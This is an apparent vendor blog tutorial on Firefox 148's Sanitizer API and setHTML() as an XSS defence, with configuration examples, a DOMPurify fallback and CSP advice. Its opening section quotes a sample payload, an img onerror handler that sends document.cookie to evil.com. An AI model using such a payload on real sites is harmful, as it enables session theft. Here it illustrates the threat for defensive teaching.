
How to Use the Sanitizer API for Stronger XSS Protection in Firefox 148

April 27, 2026 / OpDeck Team
XSS Protection · Sanitizer API · Firefox Security · Web Development · Cybersecurity

Cross-site scripting (XSS) has been the bane of web developers for decades. Despite being well-understood, it consistently ranks among the top web vulnerabilities year after year. The root cause is deceptively simple: developers need to insert dynamic HTML into the DOM, and the tools available to do so — primarily innerHTML — have always been a loaded gun. One slip, one piece of untrusted content slipping through, and an attacker can execute arbitrary JavaScript in your users' browsers.

Firefox 148 changes this calculus significantly by shipping the first standardized implementation of the Sanitizer API, introducing a new DOM method called setHTML(). This isn't just a new API for the sake of novelty — it's a fundamental shift in how browsers can help developers handle untrusted HTML safely, by default.

This guide dives deep into what the Sanitizer API actually does, how to use it correctly, what its limitations are, and how it fits into a broader strategy for building secure, performant, and SEO-friendly web applications.


Why innerHTML Has Always Been Dangerous

To understand why setHTML() matters, you need to understand exactly why innerHTML is problematic. When you set innerHTML, the browser parses the provided string as HTML and inserts the resulting DOM nodes. This is fast, convenient, and extremely powerful — which is precisely the problem.

Consider this common pattern:

const userInput = getCommentFromServer(); // untrusted content
document.getElementById('comment').innerHTML = userInput;

If userInput contains something like:

<img src="x" onerror="fetch('https://evil.com/steal?c=' + document.cookie)">

the browser happily executes that onerror handler the moment the broken image fails to load. The attacker now has your user's session cookie.

Developers have historically dealt with this in a few ways:

  1. Manual sanitization — writing regex-based or string manipulation logic to strip dangerous content. This is notoriously fragile and easy to get wrong.
  2. Third-party libraries — tools like DOMPurify do an excellent job, but they add dependency weight and require keeping up with updates as new attack vectors emerge.
  3. Avoiding innerHTML entirely — using textContent for plain text or building DOM nodes programmatically with createElement. This works but becomes cumbersome for rich content.
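One manual technique worth knowing is escaping rather than filtering: convert every HTML-significant character to its entity so the string can only ever render as inert text, the string-level equivalent of option 3's textContent. A minimal sketch, using a hypothetical escapeHTML helper (note that this forbids all markup, so it is no substitute for a real sanitizer when rich content is needed):

```javascript
// Hypothetical helper: escape HTML-significant characters so user input
// renders as inert text instead of markup. This neutralizes everything,
// including legitimate formatting tags.
function escapeHTML(str) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => entities[ch]);
}

escapeHTML('<img src=x onerror=alert(1)>');
// → '&lt;img src=x onerror=alert(1)&gt;'
```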

None of these solutions is ideal. The browser itself has always had the parsing logic to know what's dangerous — it just never exposed a safe API for developers to use that logic directly.


Introducing the Sanitizer API and setHTML()

The Sanitizer API is a W3C specification that gives developers a browser-native way to sanitize HTML before it touches the DOM. Firefox 148 is the first browser to ship the standardized version of this API.

The core of the API is the setHTML() method on Element, combined with the Sanitizer class. Here's the most basic usage:

const userInput = '<p>Hello <b>world</b></p><script>alert("xss")</script>';
const element = document.getElementById('output');
element.setHTML(userInput);

Even without any configuration, setHTML() strips dangerous elements like <script> tags and event handler attributes like onclick, onerror, and onload. The output in the DOM will be:

<p>Hello <b>world</b></p>

The <script> tag is gone. No configuration required, no third-party library, no regex.

Using the Sanitizer Class for Custom Rules

The default sanitizer is intentionally conservative. For most use cases, the defaults are appropriate. But the API also exposes a Sanitizer class that lets you configure exactly what's allowed:

const sanitizer = new Sanitizer({
  allowElements: ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li'],
  allowAttributes: {
    'a': ['href', 'title'],
  },
  blockElements: ['div'],
  dropElements: ['script', 'style', 'iframe'],
});

element.setHTML(userInput, { sanitizer });

Let's break down the configuration options:

  • allowElements: An explicit allowlist of HTML elements. Only these elements will be kept in the output.
  • allowAttributes: A map of element names to allowed attribute lists. Attributes not in this map are stripped.
  • blockElements: Elements whose tags are removed but whose children are kept. A <div> with children becomes just the children.
  • dropElements: Elements that are removed entirely, including their children.

This level of control is powerful. You can allow rich text formatting for a blog comment system while completely blocking anything that could execute code or leak data.

setHTMLUnsafe() — When You Need to Bypass Sanitization

The API also introduces setHTMLUnsafe(), which works like the old innerHTML — no sanitization is applied. The name is deliberately alarming. It exists for cases where you have already sanitized content server-side and need to insert it without double-processing, or when you're working with fully trusted content.

// Only use this when you are certain the content is safe
element.setHTMLUnsafe(trustedServerRenderedHTML);

Think of setHTMLUnsafe() as innerHTML with a clear warning label. If you find yourself reaching for it with untrusted content, you're doing it wrong.


How the Sanitizer API Compares to DOMPurify

DOMPurify has been the gold standard for client-side HTML sanitization for years, and it's genuinely excellent software. So why does a browser-native API matter?

Performance: DOMPurify works by parsing HTML into a temporary DOM, walking the tree, removing dangerous nodes, and serializing back to a string. The Sanitizer API integrates directly into the browser's HTML parser pipeline, avoiding the serialization step entirely. For applications that sanitize large volumes of content — comment feeds, rich text editors, CMS previews — this can be a meaningful performance improvement.

Security surface area: DOMPurify is maintained by a small team and requires updates when new attack vectors are discovered. A browser-native implementation is maintained by the browser vendor's security team, gets updated with browser updates, and benefits from the same scrutiny applied to the browser's own security model.

No dependency: One less dependency means one less attack surface for supply chain attacks, one less thing to update, and one less bundle size concern.

Standardization: Because the Sanitizer API is a W3C standard, behavior will eventually be consistent across all browsers. DOMPurify has some browser-specific quirks and edge cases.

That said, DOMPurify still has advantages right now:

  • Browser support: The Sanitizer API is currently only in Firefox 148+. Chrome and Safari have not yet shipped the standardized version. For production use today, you still need DOMPurify as a fallback.
  • Maturity: DOMPurify has been battle-tested against an enormous range of attack payloads over many years.

The pragmatic approach is to use the Sanitizer API where available and fall back to DOMPurify:

function safeSetHTML(element, html, sanitizerConfig = {}) {
  if (typeof element.setHTML === 'function') {
    const sanitizer = Object.keys(sanitizerConfig).length
      ? new Sanitizer(sanitizerConfig)
      : undefined;
    element.setHTML(html, sanitizer ? { sanitizer } : {});
  } else {
    // Fallback path: assumes DOMPurify is already loaded on the page
    element.innerHTML = DOMPurify.sanitize(html);
  }
}

XSS Protection as Part of a Broader Security Strategy

The Sanitizer API is a powerful tool, but it's not a complete XSS defense on its own. It handles the client-side DOM insertion problem. A comprehensive XSS strategy also needs:

Content Security Policy (CSP)

CSP is an HTTP response header that tells the browser which sources of scripts, styles, and other resources are trusted. Even if an attacker somehow injects a script, a well-configured CSP can prevent it from executing.

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'; object-src 'none';

CSP is your defense in depth. The Sanitizer API prevents injection; CSP limits the damage if injection somehow occurs.

Server-Side Sanitization

Never rely solely on client-side sanitization for content that gets stored and served to other users. If a user submits a comment, sanitize it on the server before storing it in your database. Libraries like bleach (Python), sanitize-html (Node.js), or HtmlSanitizer (.NET) handle this.

Client-side sanitization with the Sanitizer API is your last line of defense before DOM insertion, not your only line.

Security Headers Audit

Beyond CSP, several other HTTP security headers contribute to XSS defense:

  • X-Content-Type-Options: nosniff — prevents MIME type sniffing that can lead to script execution
  • X-Frame-Options: DENY or SAMEORIGIN — prevents clickjacking (largely superseded by CSP's frame-ancestors directive, but still worth sending for older browsers)
  • Referrer-Policy — controls referrer information leakage

You can check all of these headers quickly using the Vulnerability Scanner on OpDeck, which audits your security headers and flags common misconfigurations.


Impact on SEO and Performance

Security changes sometimes have unintended consequences for SEO and performance. Here's what you need to know about the Sanitizer API in that context.

SEO Considerations

The Sanitizer API operates entirely client-side, at DOM insertion time, so it has no effect on the HTML that search engine crawlers receive when they fetch your page. If you render content server-side (SSR) or pre-render, crawlers see your server-generated markup unchanged; the Sanitizer API only shapes what is inserted into the live DOM afterwards.

However, if you're building a single-page application where content is fetched and injected client-side, the Sanitizer API affects what ends up in the DOM that JavaScript-capable crawlers like Googlebot see. Since the sanitizer removes dangerous elements but preserves legitimate content, there should be no negative SEO impact — in fact, cleaner HTML can only help.

For content-heavy applications, running an SEO Audit after implementing the Sanitizer API is a good sanity check to confirm that important content — headings, links, body text — is being preserved correctly after sanitization.

Performance Impact

Replacing innerHTML with setHTML() should be neutral to positive for performance. The browser-native implementation avoids the overhead of a JavaScript-based sanitization library. For applications doing heavy DOM manipulation — think real-time comment feeds, collaborative editors, or content dashboards — the reduced CPU time can meaningfully improve rendering performance.

You can measure before and after using the Website Performance Analyzer, which runs Lighthouse-based audits and surfaces JavaScript execution time, main thread blocking, and time-to-interactive metrics.

Caching Considerations

The Sanitizer API itself doesn't affect HTTP caching. But if you're moving sanitization from server-side to client-side as part of a refactor, make sure your API responses that return raw HTML are still being cached appropriately. Raw, unsanitized HTML from an API should typically not be cached in a CDN without careful thought about cache poisoning risks.
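As one conservative assumption for such an endpoint (not a universal rule), responses carrying raw, user-supplied HTML destined for client-side sanitization might opt out of shared caching entirely:

Cache-Control: private, no-store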

Use the Cache Inspector to verify that your API responses and static assets have the correct Cache-Control, ETag, and Vary headers.


Practical Implementation Guide

Here's a step-by-step approach to adopting the Sanitizer API in a real application.

Step 1: Audit Your innerHTML Usage

Search your codebase for every use of innerHTML that involves dynamic content:

grep -rnE "innerHTML\s*\+?=" src/ --include="*.js" --include="*.ts" --include="*.jsx" --include="*.tsx"

For each occurrence, ask: is this content trusted (hardcoded or from your own templates), or is it dynamic (from user input, an API, or a database)?

Step 2: Categorize and Prioritize

  • Trusted, static content: Leave as-is or switch to setHTMLUnsafe() for clarity.
  • Dynamic content from your own API with server-side sanitization: Consider setHTMLUnsafe() with a comment explaining the trust chain.
  • Untrusted user content: Replace with setHTML() immediately.

Step 3: Define Your Sanitizer Configurations

Don't use one global sanitizer for everything. Define configurations based on context:

// For rich text blog comments
const commentSanitizer = new Sanitizer({
  allowElements: ['p', 'b', 'i', 'em', 'strong', 'a', 'blockquote', 'code', 'pre', 'ul', 'ol', 'li'],
  allowAttributes: { 'a': ['href', 'rel'] },
});

// For simple user display names (no HTML at all)
const plainTextSanitizer = new Sanitizer({
  allowElements: [],
});

// For admin-controlled content that can include media
const richMediaSanitizer = new Sanitizer({
  allowElements: ['p', 'div', 'img', 'figure', 'figcaption', 'h2', 'h3', 'ul', 'ol', 'li', 'a', 'b', 'i'],
  allowAttributes: {
    'img': ['src', 'alt', 'width', 'height'],
    'a': ['href', 'rel', 'target'],
  },
});

Step 4: Implement with Fallback

Use the progressive enhancement pattern shown earlier to support both Firefox 148+ and other browsers.

Step 5: Test Against Known XSS Payloads

Run your implementation against a payload list. The OWASP XSS Filter Evasion Cheat Sheet is a good resource. Verify that your sanitizer configuration blocks all payloads while preserving legitimate content.
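A minimal regression harness for this step might look like the following sketch. It assumes a sanitize function wrapping whatever path your app uses (a wrapper around setHTML on a detached element, or DOMPurify.sanitize); the payload list and the survivor check are illustrative, not exhaustive:

```javascript
// A few illustrative payloads; in practice, pull from the OWASP cheat sheet.
const payloads = [
  '<script>alert(1)</script>',
  '<img src=x onerror=alert(1)>',
  '<svg onload=alert(1)>',
  '<a href="javascript:alert(1)">click</a>',
];

// `sanitize` is your application's sanitization path. Throws if any
// payload survives with an obviously dangerous construct intact.
function checkPayloads(sanitize) {
  const survivors = payloads.filter((p) => {
    const out = sanitize(p);
    return /<script|\son\w+\s*=|javascript:/i.test(out);
  });
  if (survivors.length) {
    throw new Error(`Payloads survived sanitization:\n${survivors.join('\n')}`);
  }
  return true;
}
```

A crude pattern check like this is a smoke test, not proof of safety; keep the real assertion in manual review and browser-based testing.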


What's Coming Next

The Sanitizer API specification is still evolving. Future additions being discussed include:

  • sanitizeFor(): A method that sanitizes HTML for a specific target element type, returning a DocumentFragment rather than modifying an element directly.
  • Trusted Types integration: The Sanitizer API is designed to work alongside the Trusted Types API, which prevents DOM XSS by requiring that strings be explicitly marked as trusted before being assigned to dangerous sinks like innerHTML.
  • Cross-browser support: Chrome has been working on an implementation, and Safari will follow. The standardization effort means that once all major browsers ship, the Sanitizer API becomes a baseline feature with no polyfill needed.

Conclusion

The Sanitizer API and setHTML() represent a meaningful step forward in the web platform's built-in security capabilities. By moving HTML sanitization from userland JavaScript libraries into the browser itself, Firefox 148 gives developers a faster, more maintainable, and more trustworthy way to handle untrusted content.

The practical path forward is clear: audit your innerHTML usage, replace dynamic insertions with setHTML() where supported, maintain a DOMPurify fallback for other browsers, and layer in CSP and server-side sanitization for defense in depth.

Security, performance, and SEO are not competing concerns — they reinforce each other. Cleaner, sanitized HTML is better for crawlers, faster to parse, and safer for users.

If you want to audit your site's current security posture, check your caching configuration, or run an SEO analysis, OpDeck has the tools to do it in minutes — no setup required.